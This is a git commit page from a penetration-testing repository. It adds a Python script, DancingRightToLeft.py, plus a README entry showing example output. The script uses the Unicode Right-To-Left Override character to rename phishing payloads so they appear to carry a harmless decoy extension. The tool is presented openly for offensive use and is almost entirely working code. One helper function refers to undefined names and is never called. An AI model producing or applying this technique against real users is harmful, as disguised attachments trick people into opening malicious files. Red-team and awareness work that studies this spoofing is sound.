Git
/
mgeeky-Penetration-Testing-Tools
mirror of https://github.com/mgeeky/Penetration-Testing-Tools.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added DancingRightToLeft.py script.

This commit is contained in:
mgeeky 2022-02-06 22:24:09 +01:00
parent 6079c3aefe
commit b12ab57e05
2 changed files with 138 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

112
phishing/DancingRightToLeft.py Normal file
View File

@ -0,0 +1,112 @@
#!/usr/bin/python3
#
# A script abusing Right-To-Left Override unicode byte to rename phishing payloads.
#
# Sources:
# - http://unicode.org/reports/tr36/#Bidirectional_Text_Spoofing
# - https://www.mozilla.org/en-US/security/advisories/mfsa2009-62/
# - https://krebsonsecurity.com/2011/09/right-to-left-override-aids-email-attacks/
# - https://twitter.com/ffforward/status/1486743442801704974
#
# Mariusz Banach, mgeeky, "22
# <mb [at] binary-offensive.com>
#
import os, sys
import shutil
import string
import argparse
RTLO = '\u202E' # Right-To-Left Override
def rightToLeftOverride(phrase):
for i in range(len(phrase)-1)[::-1]:
if options['simulate']:
cand = phrase[:i] + phrase[i:][::-1]
else:
cand = phrase[:i] + Constants['RTLO'] + phrase[i:]
def opts(argv):
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <filename> <decoy-extension>')
parser.add_argument('filename', help='Payload file that we wish to rename.')
parser.add_argument('decoy_extension', help='Extension that we wish our payload to mimic via RTLO')
parser.add_argument('-p', '--padding', default=' ', help='If current file extension length is different than decoy extension length, pad filename with this character. Default: space.')
args = parser.parse_args()
args.filename = os.path.abspath(args.filename)
if args.decoy_extension.startswith('.'):
args.decoy_extension = args.decoy_extension[1:]
if '.' not in args.filename:
print('[!] Input filename does not have extension! You must point this script to the existing file having some original extension.')
sys.exit(1)
return args
def main(argv):
print('''
:: Dancing Right-To-Left
A script abusing Right-To-Left Override unicode byte to rename phishing payloads.
Mariusz Banach / mgeeky '22, (@mariuszbit)
<mb@binary-offensive.com>
''')
args = opts(argv)
if not args:
return False
filename, ext = os.path.splitext(args.filename)
filename2 = os.path.basename(filename)
ext = ext.replace('.', '')
if len(ext) == 0:
print('[!] Input filename does not have extension! You must point this script to the existing file having some original extension.')
sys.exit(1)
targetext = args.decoy_extension[::-1]
q = ''
if len(targetext) < len(ext):
filename2 += (len(ext) - len(targetext)) * args.padding
q = '"'
elif len(targetext) > len(ext):
filename2 += (len(targetext) - len(ext)) * args.padding
q = '"'
out1 = filename2 + '\\u202e' + targetext + '.' + ext
rest = targetext + '.' + ext
out2 = filename2 + rest[::-1]
out3 = filename2 + RTLO + targetext + '.' + ext
print(f'''INPUT:
Payload Filename : {os.path.basename(args.filename)}
Payload Extension : {q}.{ext}{q}
Decoy payloads' extension as : {q}.{args.decoy_extension}{q}
OUTPUT:
Your file was named in following way : {q}{out1}{q}
Your filename will look like this (simulated) : {q}{out2}{q}
Your filename will look like this (real display) : {out3}
''')
old = args.filename
new = os.path.dirname(old) + os.sep + filename2 + RTLO + targetext + '.' + ext
#
# Using manual bytes copy cause I was having some weird issues with shutil.copy()
#
with open(old, 'rb') as oldfile:
with open(new, 'wb') as newfile:
newfile.write(oldfile.read())
if __name__ == '__main__':
main(sys.argv)

26
phishing/README.md
View File

@ -1,6 +1,32 @@
## Phishing and Social-Engineering related scripts, tools and CheatSheets ## Phishing and Social-Engineering related scripts, tools and CheatSheets
- **`DancingRightToLeft.py`** - A script abusing Right-To-Left Override unicode byte to rename phishing payloads.
```
PS> py DancingRightToLeft.py 502.html fax
:: Dancing Right-To-Left
A script abusing Right-To-Left Override unicode byte to rename phishing payloads.
Mariusz Banach / mgeeky '22, (@mariuszbit)
<mb@binary-offensive.com>
INPUT:
Payload Filename : 502.html
Payload Extension : ".html"
Decoy payloads' extension as : ".fax"
OUTPUT:
Your file was named in following way : "502 \u202exaf.html"
Your filename will look like this (simulated) : "502 lmth.fax"
Your filename will look like this (real display) : 502 xaf
```
- [**`decode-spam-headers.py`**](https://github.com/mgeeky/decode-spam-headers) - This tool accepts on input an `*.EML` or `*.txt` file with all the SMTP headers. It will then extract a subset of interesting headers and using **79+** tests will attempt to decode them as much as possible. - [**`decode-spam-headers.py`**](https://github.com/mgeeky/decode-spam-headers) - This tool accepts on input an `*.EML` or `*.txt` file with all the SMTP headers. It will then extract a subset of interesting headers and using **79+** tests will attempt to decode them as much as possible.
This script also extracts all IPv4 addresses and domain names and performs full DNS resolution of them. This script also extracts all IPv4 addresses and domain names and performs full DNS resolution of them.